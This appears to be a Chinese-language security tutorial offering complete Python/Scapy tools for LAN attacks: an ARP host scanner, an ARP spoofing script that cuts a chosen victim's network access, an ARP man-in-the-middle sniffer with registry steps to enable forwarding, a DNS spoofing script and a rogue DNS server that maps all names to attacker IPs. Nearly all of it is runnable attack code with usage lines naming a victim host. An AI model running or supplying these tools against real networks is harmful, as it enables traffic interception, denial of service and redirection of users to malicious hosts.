ARP欺骗又称ARP毒化或ARP攻击,是针对以太网地址解析协议ARP的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。
实现ARP扫描: 运用Scapy工具包,开发一款ARP扫描工具,扫描网段内所有的在线主机并显示其MAC地址。
from scapy.all import *
from optparse import OptionParser
import threading
def parse_ip(targets):
_split = targets.split('-')
first_ip = _split[0]
ip_split = first_ip.split('.')
ipv4 = range(int(ip_split[3]),int(_split[1])+1)
addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]
return addr
def arp_scan(address):
try:
ret = sr1(ARP(pdst=address),timeout=5,verbose=False)
if ret:
if ret.haslayer('ARP') and ret.fields['op'] == 2:
print('[+] IP地址: {} => MAC地址:{}'.format(ret.fields['psrc'],ret.fields['hwsrc']))
except Exception:
exit(1)
def Banner():
print(" _ ____ _ _ ")
print(" | | _ _/ ___|| |__ __ _ _ __| | __")
print(" | | | | | \___ \| '_ \ / _` | '__| |/ /")
print(" | |__| |_| |___) | | | | (_| | | | < ")
print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\")
print(" |___/ \n")
print("E-Mail: me@lyshark.com\n")
if __name__ == "__main__":
Banner()
parser = OptionParser()
parser.add_option("-a","--addr",dest="address",help="--> input 192.168.1.0-100")
(options,args) = parser.parse_args()
if options.address:
addr_list = parse_ip(options.address)
for item in addr_list:
threads = []
t = threading.Thread(target=arp_scan,args=(item,))
threads.append(t)
t.start()
for item in threads:
item.join()
else:
parser.print_help()执行扫描如下:
实现ARP欺骗: 通过ARP协议扫描网络中在线主机,并能够指定IP地址断掉网络.
from scapy.all import *
import argparse
import threading,time
# 生成网段信息,例如输入: 192.168.1.1/20 生成`1-20`地址
def Parse_IP(targets):
_split = targets.split('/')
first_ip = _split[0]
ip_split = first_ip.split('.')
ipv4 = range(int(ip_split[3]),int(_split[1])+1)
addr = [ ip_split[0]+'.'+ip_split[1]+'.'+ip_split[2]+'.'+str(p) for p in ipv4 ]
return addr
# 通过ARP协议扫描局域网中在线的设备
def ARP_Scan(address):
try:
ret = sr1(ARP(pdst=address),timeout=5,verbose=False)
if ret:
if ret.haslayer('ARP') and ret.fields['op'] == 2:
print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'],ret.fields['hwsrc']))
except Exception:
exit(1)
# 创建并发送有效载荷
def SendPayload(Interface,srcMac,tgtMac,gateWayMac,gatewayIP,tgtIP):
print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac,tgtIP))
# 生成ARP数据包,伪造网关欺骗目标计算机
sendp(Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2),iface=Interface)
# 生成ARP数据包,伪造目标计算机欺骗网关
sendp(Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2),iface=Interface)
print("-------------------------------------------------------------------------")
def Banner():
print(" _ ____ _ _ ")
print(" | | _ _/ ___|| |__ __ _ _ __| | __")
print(" | | | | | \___ \| '_ \ / _` | '__| |/ /")
print(" | |__| |_| |___) | | | | (_| | | | < ")
print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\")
print(" |___/ \n")
print("E-Mail: me@lyshark.com\n")
if __name__ == "__main__":
Banner()
parser = argparse.ArgumentParser()
parser.add_argument("-s","--scan",dest="scan",help="输入一个扫描网段")
parser.add_argument("-i","--interface",dest="interface",help="输入接口名")
parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址")
parser.add_argument("-t","--target",dest="target",help="输入被害主机地址")
args = parser.parse_args()
# 使用方式: main.py -s192.168.1.1/100
if args.scan:
addr_list = Parse_IP(args.scan)
for item in addr_list:
threads = []
t = threading.Thread(target=ARP_Scan,args=(item,))
threads.append(t)
t.start()
for item in threads:
item.join()
# 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10
elif args.gateway and args.target and args.scan == None:
srcMac = get_if_hwaddr(args.interface) # 通过接口名称获取本机MAC地址
tgtMac = getmacbyip(args.target) # 通过IP地址获取目标计算机的MAC地址
gatewayMac = getmacbyip(args.gateway) # 指定本机网段的网关MAC地址
while True:
t = threading.Thread(target=SendPayload,args=(args.interface,srcMac,tgtMac,gatewayMac,args.gateway,args.target))
t.start()
t.join()
time.sleep(1)
else:
parser.print_help()开启转发功能,开始运行里面输入regedit打开注册表编辑器,在注册表定位下面注册表项。
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/ Services/Tcpip/Parameters
选择下面的项目:IPEnableRouter:REG_DWORD:0x0 找到项目鼠标右键修改数值为1
ARP数据嗅探: 利用欺骗实现的局域网嗅探工具Windows下需要开启Routing And RemoteAccess转发服务.
import sys,os,threading
import argparse
from scapy.all import *
# 生成ARP数据包,伪造网关欺骗目标计算机
def createArp2Station(interface,target_ip,gateway_ip):
dst_Mac=str(getmacbyip(target_ip))
self_Mac=str(get_if_hwaddr(interface))
Ether_data=Ether(src=self_Mac,dst=dst_Mac) / ARP(op=2,hwsrc=self_Mac,psrc=gateway_ip,hwdst=dst_Mac,pdst=target_ip)
try:
sendp(Ether_data,inter=2,iface=interface,loop=1)
except Exception as e:
print("目标ARP数据发送失败!")
# 生成ARP数据包,伪造目标计算机欺骗网关
def createArp2Gateway(interface,target_ip,gateway_ip):
dst_Mac = getmacbyip(gateway_ip)
self_Mac = get_if_hwaddr(interface)
Ether_data = None
Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=target_ip, hwdst=dst_Mac, pdst=gateway_ip)
try:
sendp(Ether_data, inter=2,iface=interface,loop=1)
except Exception as e:
print("网关ARP数据发送失败!")
def Packet_CallBack(pkt):
if pkt.haslayer(IP):
if pkt.getlayer(IP).src != "127.0.0.1":
ip_src = pkt.getlayer(IP).src
ip_dst = pkt.getlayer(IP).dst
print("源地址: {} ---> 目标地址: {}".format(ip_src,ip_dst))
def Banner():
print(" _ ____ _ _ ")
print(" | | _ _/ ___|| |__ __ _ _ __| | __")
print(" | | | | | \___ \| '_ \ / _` | '__| |/ /")
print(" | |__| |_| |___) | | | | (_| | | | < ")
print(" |_____\__, |____/|_| |_|\__,_|_| |_|\_\\")
print(" |___/ \n")
print("E-Mail: me@lyshark.com\n")
if __name__ == "__main__":
# 使用方式: main.py -i "Realtek PCIe GBE Family Controller" -g 192.168.1.1 -t 192.168.1.10
Banner()
parser = argparse.ArgumentParser()
parser.add_argument("-i","--interface",dest="interface",help="输入网卡名称")
parser.add_argument("-t","--target_ip",dest="target_ip",help="输入目标主机IP")
parser.add_argument("-g","--gateway",dest="gateway",help="输入网关地址")
args = parser.parse_args()
if args.interface and args.target_ip and args.gateway:
try:
t1=threading.Thread(target=createArp2Station,args=(args.interface,args.target_ip,args.gateway))
t1.setDaemon(True)
t1.start()
t2=threading.Thread(target=createArp2Gateway,args=(args.interface,args.target_ip,args.gateway))
t2.setDaemon(True)
t2.start()
sniff(prn=Packet_CallBack,filter="tcp",iface=args.interface)
except Exception:
sys.exit(1)
while True:
pass
else:
parser.print_help()
# http and ip.src_host==192.168.1.6 and http.request.method==GET and !(http.request.full_uri matches "http://.*\.jpg.*")实现DNS欺骗: 网上其他人的一种实现方法,代码如下,只不过我们只做了ARP骗,而在该欺骗基础上可以加强为DNS欺骗。
import sys
import os
import threading
from scapy.all import *
from optparse import OptionParser
#DNS欺骗函数
def DNS_Spoof(data):
if data.haslayer(DNS):
try:
#构造DNS AN数据
dns_an=DNSRR(rrname=data[DNS].qd.qname,rdata=jokers)
#构造IP/UDP数据包
repdata=IP(src=data[IP].dst,dst=data[IP].src)/UDP(dport=data[IP].sport,sport=53)
#构造DNS数据包
repdata/=DNS(id=data[DNS].id,qd=data[DNS].qd,qr=1,an=dns_an)
#攻击信息输出
print ('\nhancker ip :' + jokers + " url : "+data[DNS].qd.qname)
#发送数据包
send(repdata)
except Exception:
sys.exit(1)
#DNS欺骗函数
def DNS_S(dns_ip,iface):
global jokers
jokers=dns_ip
print ("DNS欺骗开始!")
sniff(prn=DNS_Spoof,filter='udp dst port 53',iface=iface)
#ARP欺骗函数
def op(eths,mubiao_ip,Ps,gateway_ip):
ip=mubiao_ip
wifi=gateway_ip
#目标设备MAC地址
dst_Mac=str(getmacbyip(ip))
#黑客设备mac地址
self_Mac=str(get_if_hwaddr(eths))
#网关MAC地址
wifi_Mac=str(getmacbyip(wifi))
#构造以太帧数据
Ether_data=Ether(src=self_Mac,dst=dst_Mac)/ARP(op=2,hwsrc=self_Mac,psrc=wifi,hwdst=dst_Mac,pdst=ip)
try:
#发送以太帧数据,sendp发送OSI模型中的二层数据
sendp(Ether_data,inter=2,iface=eths,loop=1)
except Exception as e:
print("目标ARP数据发送失败!")
def wifi(eths,mubiao_ip,gateway_ip,Ps,dns_ip):
ip=gateway_ip
dst=mubiao_ip
et = eths
#根据IP获取MAC
dst_Mac = getmacbyip(ip)
#根据网卡获取MAC
self_Mac = get_if_hwaddr(et)
Ether_data = None
if Ps=="1":
#构造以太帧数据与ARP响应数据,ARP协议源地址给一个不存在的MAC地址与正确的IP地址对应,实现双向的无法解析,ARP协议的op参数是状态,2为响应数据,1为请求数据
Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc='12:1a:13:a3:13:ef', psrc=dst, hwdst=dst_Mac, pdst=ip)
#新线程,开始DNS欺骗
t3 = threading.Thread(target=DNS_S, args=(dns_ip,eths))
t3.setDaemon(True)
t3.start()
if Ps == "0":
#构造以太帧数据与ARP响应数据,这里因为不需要DNS欺骗,所以不需要一个假的MAC地址,让双方通信设备正常访问即可
Ether_data = Ether(src=self_Mac, dst=dst_Mac) / ARP(op=2, hwsrc=self_Mac, psrc=dst, hwdst=dst_Mac, pdst=ip)
if Ps!="1" and Ps!="0":
print (Ps)
print (type(Ps))
print ('-P 参数有误!')
sys.exit(1)
try:
sendp(Ether_data, inter=2,iface=et,loop=1)
except Exception as e:
print("网关ARP数据发送失败!")
def main():
try:
eth= "Realtek PCIe GBE Family Controller"
mubiao="192.168.1.6"
gateway="192.168.1.1"
P="0"
dip="8.8.8.8"
t1=threading.Thread(target=op,args=(eth,mubiao,P,gateway))
t1.setDaemon(True)
t1.start()
t2=threading.Thread(target=wifi,args=(eth,mubiao,gateway,P,dip))
t2.setDaemon(True)
t2.start()
except Exception as e:
print (e)
sys.exit(1)
while True:
pass
if __name__ == '__main__':
main()DNS欺骗需要一个DNS解析服务器,这里从网上找到一个DNS解析服务器代码,可以快速解析。
import socketserver,struct
class SinDNSQuery:
def __init__(self, data):
i = 1
self.name = ''
while True:
d = data[i]
if d == 0:
break;
if d < 32:
self.name = self.name + '.'
else:
self.name = self.name + chr(d)
i = i + 1
self.querybytes = data[0:i + 1]
(self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
self.len = i + 5
def getbytes(self):
return self.querybytes + struct.pack('>HH', self.type, self.classify)
class SinDNSAnswer:
def __init__(self, ip):
self.name = 49164
self.type = 1
self.classify = 1
self.timetolive = 190
self.datalength = 4
self.ip = ip
def getbytes(self):
res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
s = self.ip.split('.')
res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
return res
class SinDNSFrame:
def __init__(self, data):
(self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
self.query = SinDNSQuery(data[12:])
def getname(self):
return self.query.name
def setip(self, ip):
self.answer = SinDNSAnswer(ip)
self.answers = 1
self.flags = 33152
def getbytes(self):
res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
res = res + self.query.getbytes()
if self.answers != 0:
res = res + self.answer.getbytes()
return res
class SinDNSUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0].strip()
dns = SinDNSFrame(data)
socket = self.request[1]
namemap = SinDNSServer.namemap
if(dns.query.type==1):
name = dns.getname();
if namemap.__contains__(name):
dns.setip(namemap[name])
socket.sendto(dns.getbytes(), self.client_address)
elif namemap.__contains__('*'):
dns.setip(namemap['*'])
socket.sendto(dns.getbytes(), self.client_address)
else:
socket.sendto(data, self.client_address)
else:
socket.sendto(data, self.client_address)
class SinDNSServer:
def __init__(self, port=53):
SinDNSServer.namemap = {}
self.port = port
def addname(self, name, ip):
SinDNSServer.namemap[name] = ip
def start(self):
HOST, PORT = "0.0.0.0", self.port
server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)
server.serve_forever()
if __name__ == "__main__":
server = SinDNSServer()
server.addname('www.lyshark.com', '192.168.1.1')
server.addname('*', '192.168.1.2')
server.start()